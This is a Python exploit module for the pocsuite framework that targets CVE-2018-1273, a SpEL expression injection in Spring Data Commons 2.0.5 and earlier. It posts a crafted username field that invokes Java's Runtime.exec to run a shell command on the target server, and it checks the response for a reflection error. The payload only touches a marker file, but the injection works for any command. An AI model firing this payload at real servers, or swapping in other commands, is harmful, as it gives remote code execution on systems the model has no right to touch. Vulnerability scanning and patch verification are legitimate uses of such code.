#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.request import req #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

# Request headers: a browser-like User-Agent plus the form content type that
# matches how the probe body below is encoded.
headers = {
    'user-agent': (
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 '
        '(KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36'
    ),
    'content-type': 'application/x-www-form-urlencoded',
    'Accept-Encoding': 'gzip, deflate, br',
}
# Probe body sent by poc(). On a vulnerable host its only side effect is the
# creation of the marker file /tmp/success -- the on-host artifact a defender
# can look for when triaging a positive result.
poc_str = '''username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword='''
def poc(url):
    """Post the probe body to ``<url>/users?page=&size=5`` and return the response text.

    ``url`` may be a bare host; when it does not start with ``http`` the
    ``http://`` scheme is prepended (an ``https://`` input is left as is).
    Any exception raised while sending the request or reading the body is
    swallowed and ``""`` is returned, so callers see "no response" and
    "marker absent" the same way.
    """
    target = url if url.startswith("http") else "http://" + url
    # Effectively always true once a scheme separator is present ("http://"
    # contains "/"); only an input starting with "http" but holding no "/"
    # skips the path. An input that already ends in "/" yields "//users".
    if "/" in target:
        target += '/users?page=&size=5'
    try:
        # verify=False: TLS certificate validation is skipped on purpose so
        # self-signed scan targets respond; the body is untrusted input.
        return req.post(target, data=poc_str, verify=False, timeout=5, headers=headers).text
    except Exception:
        return ""


class TestPOC(POCBase):
    """pocsuite PoC record for CVE-2018-1273 (Spring Data Commons SpEL injection).

    Both modes send the single request built by the module-level ``poc``
    helper; ``_attack`` simply delegates to ``_verify``.
    """
    name = 'SpringDataCommons_RCE_CVE-2018-1273'
    vulID = 'CVE-2018-1273'  # https://www.seebug.org/vuldb/ssvid-97238
    author = ['debug']
    vulType = 'RCE'
    version = '1.0'  # default version: 1.0
    references = ['http://blog.nsfocus.net/cve-2018-1273-analysis/']
    desc = '''
		   Spring Data是一个用于简化数据库访问，并支持云服务的开源框架，Spring Data Commons是Spring Data下所有子项目共享的基础框架。
		   Spring Data Commons 在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。
		   '''
    vulDate = '2020-02-06'
    createDate = '2020-02-06'
    updateDate = '2020-02-06'
    appName = 'SpringDataCommons'
    appVersion = '<=2.0.5'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode -- no separate payload; reuses the verify probe.'''
        return self._verify()

    def _verify(self):
        '''verify mode: one request, then a substring match on the reply.'''
        # NOTE(review): the indicator is a generic reflection-error message, so a
        # match shows the SpEL path was exercised, not that the command ran.
        # Treat positives as candidates to confirm (e.g. the marker file on the host).
        indicator = 'nested exception is java.lang.reflect.InvocationTargetException'
        body = poc(self.url)  # self.url presumably set by POCBase -- confirm
        findings = {}
        if indicator in body:
            findings['VerifyInfo'] = {
                'URL': self.url + ' SpringDataCommons_RCE_CVE-2018-1273 is exist!',
            }
        return self.parse_output(findings)

    def parse_output(self, result):
        '''Wrap *result* in an Output: success when non-empty, fail otherwise.'''
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
            return output
        output.success(result)
        return output


register(TestPOC)  # hand the PoC class to pocsuite's register hook